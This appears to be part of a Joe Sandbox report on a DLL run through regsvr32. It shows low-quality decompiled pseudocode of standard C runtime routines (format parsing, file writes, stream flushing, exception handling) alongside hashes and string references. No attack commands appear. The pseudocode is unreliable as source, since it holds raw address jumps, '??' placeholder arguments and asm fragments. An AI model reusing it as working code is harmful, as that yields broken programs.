                                    				_a88 = E000007FE7FEF9D31E40(_t210);
                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3dd83;
                                    				_a88 = _t190 + _t210 - 0x30;
                                    				_a116 = 0;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t211 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t211);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t190 + _t211 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}







                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    • Opcode ID: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                    • Instruction ID: fc8006ff6f8d7d76551d502993a9577a4ed4fa9ca6386b0b138cfffaa104f198
                                    • Opcode Fuzzy Hash: 7ccb00da1bd0fb9220a44591d36c0492ce99534c897a7d6a17d24537f8dc2fa2
                                    • Instruction Fuzzy Hash: 48412BB2A0C6C286E7F09B64E8407BE72E4F38434AF600126D6C9875A9DB3ED444CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3BDDA(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                    				void* _t114;
                                    				char* _t134;
                                    
                                    				_a116 = 0;
                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                    				_t134 =  &_a1112;
                                    				_a116 = E000007FE7FEF9D31E40(_t134);
                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3be2d;
                                    				_a116 = _t114 + _t134 - 0x30;
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}






                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-192189897
                                    • Opcode ID: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                    • Instruction ID: 4b3f24e3fb7174c937380b25a7ddf4328f53ddd6ef2afac6cc97801a46cd3647
                                    • Opcode Fuzzy Hash: 365a2dca31272ad0c00aec3a5831cb280a19fde5761ae3667445a1def64af164
                                    • Instruction Fuzzy Hash: 41416E72A0DAC28AE3F0DB24E8547BEB7E4E385345F600126D6DD869A9DB7ED141CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3DD88(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                    				void* _t114;
                                    				char* _t134;
                                    
                                    				_a116 = 0;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t134 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t134);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t114 + _t134 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}






                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                    • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                    Similarity
                                    • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                    • API String ID: 275287319-2412454244
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _invalid_parameter_unlock
                                    • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2816345473-1282596470
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _free_nolock$_unlock
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                    • API String ID: 2500497606-1087415141
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                    • String ID: csm
                                    • API String ID: 933340387-1018135373
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-23161695
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-3042049227
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __doserrno_invalid_parameter
                                    • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 4140903211-1338331675
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: DecodePointer__doserrno_invalid_parameter
                                    • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                    • API String ID: 1098298932-1795423647
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 16%
                                    			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                    				long long _v24;
                                    				intOrPtr _v32;
                                    				long long _v40;
                                    				signed int _v48;
                                    				int _v52;
                                    				int _v56;
                                    				signed int _v64;
                                    				long long _v72;
                                    				long long _t82;
                                    
                                    				_a32 = r9d;
                                    				_a24 = __r8;
                                    				_a16 = __edx;
                                    				_a8 = __rcx;
                                    				_v56 = 0;
                                    				if (_a48 != 0) goto 0xf9d2f5ab;
                                    				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                    				if (_a64 == 0) goto 0xf9d2f5bf;
                                    				_v32 = 9;
                                    				goto 0xf9d2f5c7;
                                    				_v32 = 1;
                                    				_v64 = 0;
                                    				_v72 = 0;
                                    				r9d = _a32;
                                    				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                    				if (_v48 != 0) goto 0xf9d2f60b;
                                    				goto 0xf9d2f6f8;
                                    				if (0 != 0) goto 0xf9d2f652;
                                    				if (_v48 <= 0) goto 0xf9d2f652;
                                    				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                    				_t82 = _v48 + _v48 + 0x10;
                                    				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                    				_v24 = _t82;
                                    				goto 0xf9d2f65b;
                                    				_v24 = 0;
                                    				_v40 = _v24;
                                    				if (_v40 != 0) goto 0xf9d2f674;
                                    				goto 0xf9d2f6f8;
                                    				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                    				_v64 = _v48;
                                    				_v72 = _v40;
                                    				r9d = _a32;
                                    				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                    				if (_v52 == 0) goto 0xf9d2f6ea;
                                    				r8d = _v52;
                                    				_v56 = GetStringTypeW(??, ??, ??, ??);
                                    				E000007FE7FEF9D2F3E0(_v40);
                                    				return _v56;
                                    			}













                                    APIs
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                    • String ID:
                                    • API String ID: 2618398691-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    
                                    				_a8 = __ecx;
                                    				_v24 = 0;
                                    				_v16 = 0;
                                    				0xf9d29300();
                                    				_v20 = 0;
                                    				_v20 = _v20 + 1;
                                    				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                    				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                    				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                    				if (_a8 != 1) goto 0xf9d3ffe1;
                                    				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                    				_v24 = _v24 + 1;
                                    				goto 0xf9d40024;
                                    				if (_a8 != 0) goto 0xf9d40024;
                                    				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                    				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                    				_v16 = 0xffffffff;
                                    				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                    				goto L1;
                                    				__ecx = 1;
                                    				__eax = E000007FE7FEF9D29360(__eax, 1);
                                    				if (_a8 != 1) goto 0xf9d4005b;
                                    				__eax = _v24;
                                    				goto 0xf9d4005f;
                                    				__eax = _v16;
                                    				return _v16;
                                    			}







                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                    • String ID:
                                    • API String ID: 1144694634-0
                                    • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                    • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                    • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                    • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                    				long long _v16;
                                    				long long _v24;
                                    				intOrPtr _v32;
                                    				long long _v40;
                                    				long long _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				signed int _v64;
                                    				long long _v72;
                                    				char _v80;
                                    				long long _v88;
                                    				void* _t135;
                                    				void* _t145;
                                    				void* _t147;
                                    				void* _t148;
                                    				void* _t149;
                                    				signed int* _t200;
                                    				intOrPtr _t206;
                                    
                                    				_a32 = __r9;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				0xf9d24000();
                                    				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                    				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                    				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                    				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                    				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                    				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                    				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                    				goto 0xf9d3409c;
                                    				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                    				if (_a40[1] == 0) goto 0xf9d33ee4;
                                    				if (_a48 != 0) goto 0xf9d33ee4;
                                    				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                    				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                    				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                    				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                    				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                    				goto 0xf9d33e0f;
                                    				E000007FE7FEF9D2CF80(_a40);
                                    				r9d = _v56;
                                    				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                    				goto 0xf9d33ec7;
                                    				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                    				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                    				_v48 = _a8;
                                    				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                    				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                    				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                    				goto 0xf9d33e9a;
                                    				E000007FE7FEF9D2CF80(_a40);
                                    				r9d = _v52;
                                    				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                    				goto 0xf9d3409c;
                                    				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                    				goto 0xf9d34097;
                                    				if (_a40[3] != 0) goto 0xf9d33f59;
                                    				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                    				_t200 = _a40;
                                    				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                    				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                    				_v24 = _t200 + _a40[8];
                                    				goto 0xf9d33f4d;
                                    				_v24 = 0;
                                    				if (_v24 == 0) goto 0xf9d34097;
                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                    				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                    				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                    				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                    				E000007FE7FEF9D2E6A0(_t135, _t206);
                                    				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                    				goto 0xf9d33fce;
                                    				_v16 = 0;
                                    				_v40 = _v16;
                                    				_t177 = _v40;
                                    				if (_v40 == 0) goto 0xf9d34041;
                                    				_v64 = _a64 & 0x000000ff;
                                    				_v72 = _a56;
                                    				_v80 = _a48;
                                    				_v88 = _a40;
                                    				_v32 = _v40();
                                    				goto 0xf9d34097;
                                    				_v64 = _a56;
                                    				_v72 = _a48;
                                    				_v80 = _a64 & 0x000000ff;
                                    				_v88 = _a40;
                                    				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                    				return 1;
                                    			}






















                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _inconsistency
                                    • String ID: csm$csm
                                    • API String ID: 32975420-3733052814
                                    • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                    • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                    • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                    • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __free_lconv_mon__free_lconv_num
                                    • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                    • API String ID: 2148069796-2706031433
                                    • Opcode ID: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                    • Instruction ID: d8e48e7000e52547e61d66b201573bb281919b8ac3286b667feec84700a76b7c
                                    • Opcode Fuzzy Hash: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                    • Instruction Fuzzy Hash: 60A11E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
